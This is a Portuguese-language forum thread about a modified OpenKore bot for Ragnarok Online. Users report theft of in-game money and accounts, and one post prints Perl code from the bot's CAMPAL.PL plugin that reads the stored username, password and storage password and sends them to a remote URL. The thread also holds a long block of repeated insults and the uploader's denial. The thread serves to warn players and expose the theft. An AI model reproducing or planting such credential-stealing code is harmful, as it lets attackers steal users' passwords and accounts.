Ir para conteúdo
Faça parte da equipe! (2024) ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

Openkore 3.0 editado,com esse BOT é possivel uzalo em XP,VISTA,SEVEN,100% RENEWAL


Posts Recomendados

NAO USEM EU USEI PERDI MEU 3kk e uns ekips q eu tava guardando enton galera n usen isso a i rouba seu zeny

vi no bot indo pra Prontera,axei q tinha salvado la dps eu morri dnv e entrei no jogo eu ress la em umbala isso ker dizer q tem algo q faz da negociaçao e pega tudo o zeny

Link para o comentário
Compartilhar em outros sites

como comentei na pagina anterior fui hackeado tumb, só tava em duvidas se realmente era o boot em questão, agora tenho toda certeza que foi o mesmo...

peço a staff que tomem as devidas providencias o mas rapido possível antes que o animal em questão furte mais acc´s :sarcastico:

Link para o comentário
Compartilhar em outros sites

vai na pasta PLUGIN, acha o arquivo CAMPAL.PL escolhe ABRIR COMO e poe BLOCO de NOTAS que voces vao ver isso

 

 

 

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

 

 

é o codigo que esse debil mental ai usa pra roubar as senhas de qualquer pessoa que logar.

 

deixem de ser burros, nao baixem mais isso.

 

 

Fica dando desculpinha, TA AI A LINHA DE COMANDO. que o ladrao usou, LIXO

 

 

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

LADRAOZINHO ANALFABETO

Link para o comentário
Compartilhar em outros sites

e um nub com a mesma conta que fica vindo falar que ta com virus o bot passa o scan e confira vc mesmo,tanto se vc digitar aquele indereco ali nao vai entrar em lugar nenhum,esse bot foi passado no scan do virus total aonde tem mais de 60 antvirus eu na minha parte que uso esse bot a 1 mes nao me roubaram nd e ta super limpim esse bot,,,,

Link para o comentário
Compartilhar em outros sites

Naum acusei ngm soh pra constar.

Mas espero que algum moderador venha se pronunciar para dar seu veredito, ou alguem que saiba programar, decifrar essa linha de comando.

 

@edit, pessoal vcs tmb naum podem acusar ele sem ter provas, vai que ele pegou de algum outro forum e postou aki e ele naum sabia dessa linha de comando no campal, e tmb, o link que esta no comando, nem da pra acessar.

Link para o comentário
Compartilhar em outros sites

Mesmo eu usando maquina virtual com xp eh obrigatorio pagar ??? pos sempre da o mesmo erro ... Critial erro : you must pay to pay this account

 

Melhor dizendo ... estou usando windows sevem mais com maquina virtual e nela mesmo n consigo rodar da sempre o mesmo erro ... Critial erro : you must pay to pay this account

Link para o comentário
Compartilhar em outros sites

aiai pessoal ñ se iludam...

se usarem esse boot vcs vão ser hackiados é fatão jah!

kade os moderadores que ñ se manifestão -.-'

o mulek tah aproveitando o tempo que lhe resta pra roubar o maior numero de contas possivel até que algum moderador o pegue x.x

usei ele aki na minha makina e fui roubado 15 minutos depois

usei na maquina do meu irmão e tumb fui rackiado

e depois um amigo meu fez o teste e foi hackiado tumb, éah claro só contas sem valor algum, só meros trokados que nem isso eles perdoaram kkkkkkkkk

Link para o comentário
Compartilhar em outros sites

  • 2 semanas atrás...
Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.